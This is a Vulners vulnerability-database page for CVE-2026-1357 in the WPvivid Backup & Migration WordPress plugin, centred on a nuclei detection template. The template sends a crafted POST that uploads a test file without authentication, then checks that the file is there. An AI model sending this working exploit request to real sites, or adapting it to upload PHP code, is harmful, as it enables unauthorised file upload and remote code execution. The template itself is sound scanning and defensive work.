Lucene search
K

WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Unauthenticated arbitrary file upload in WPvivid Backup & Migration <= 0.9.123 enables code execution

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-1357
13 Feb 202609:12
githubexploit
GithubExploit
Mephisto
21 May 202605:06
githubexploit
GithubExploit
Exploit for CVE-2026-1357
25 Feb 202606:37
githubexploit
GithubExploit
Exploit for CVE-2026-1357
15 Apr 202605:02
githubexploit
GithubExploit
Exploit for Authentication Bypass by Spoofing in Booster Booster_For_Woocommerce
16 Feb 202612:12
githubexploit
GithubExploit
CVEsWorpriss
23 May 202601:52
githubexploit
GithubExploit
Exploit for CVE-2026-1357
10 Mar 202622:23
githubexploit
GithubExploit
Exploit for CVE-2026-1357
14 Feb 202605:15
githubexploit
GithubExploit
Exploit for CVE-2026-1357
10 Feb 202619:38
githubexploit
GithubExploit
Exploit for CVE-2026-1357
11 Feb 202615:26
githubexploit
Rows per page
id: CVE-2026-1357

info:
  name: WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload
  author: omarkurt
  severity: critical
  description: |
    WPvivid Backup & Migration plugin for WordPress <= 0.9.123 contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and lack of path sanitization, letting unauthenticated attackers upload arbitrary PHP files and achieve remote code execution via wpvivid_action=send_to_site parameter.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files and execute remote code, leading to full server compromise.
  remediation: |
    Update to the latest version of WPvivid Backup & Migration plugin.
  reference:
    - https://vulnerabletarget.com/VT-2026-1357
    - https://github.com/LucasM0ntes/POC-CVE-2026-1357
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1357
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1357
    epss-score: 0.32714
    epss-percentile: 0.98136
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: wpvivid
    product: wpvivid-backuprestore
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/wpvivid-backuprestore"
  tags: cve,cve2026,wordpress,wp,wp-plugin,wpvivid,file-upload,rce,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        wpvivid_action=send_to_site&wpvivid_content=MDAzQUJDMDAwMDAwMDAwMDAwMDExMDUGpYqxgOo0%2FZM3%2BLE%2B23CYS%2BI8Sbr6wwwU6dJweFxMk%2BOogH3GIpPZZMrm72oUS3vnrlf0AXv1vmGVBIbLo3QcQs%2B4JU7cLQw1kWByCFlYkpHcBuzxjEbVtT8VSdFgb6NLW6cpP4BdWT8bJx%2F%2FAOO09m3EFtf2sOcE%2BJjFJAew%2BELondwDkz3u5mssxGaQrlvWgaIlmPwz3FZx8dWC%2FHy7k4P3S5IJ7JV0tefjHJKCOzjPHngkZENu1uI2LmE6JaeF7XdXJCcmFOrNex4yJgIO0raawogHW457fM4wXKDnrM3bwxeLn5KwvAgadaTj4F9zWHxnjBmpa%2BtIaohISVcA5%2BGv6cAA95rzOoXBGUaI

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"success"'
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/vt-nuclei-test.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2026-1357-nuclei-verification-test"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a95f96c06c708b79c4eed04cf404a209f8e60710c0f2269e7d57908ce8ea9aa3022100cc75915e6bf999ee2e2bfd9be6954799d1cc236e085a3513fca0244efc67df46:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation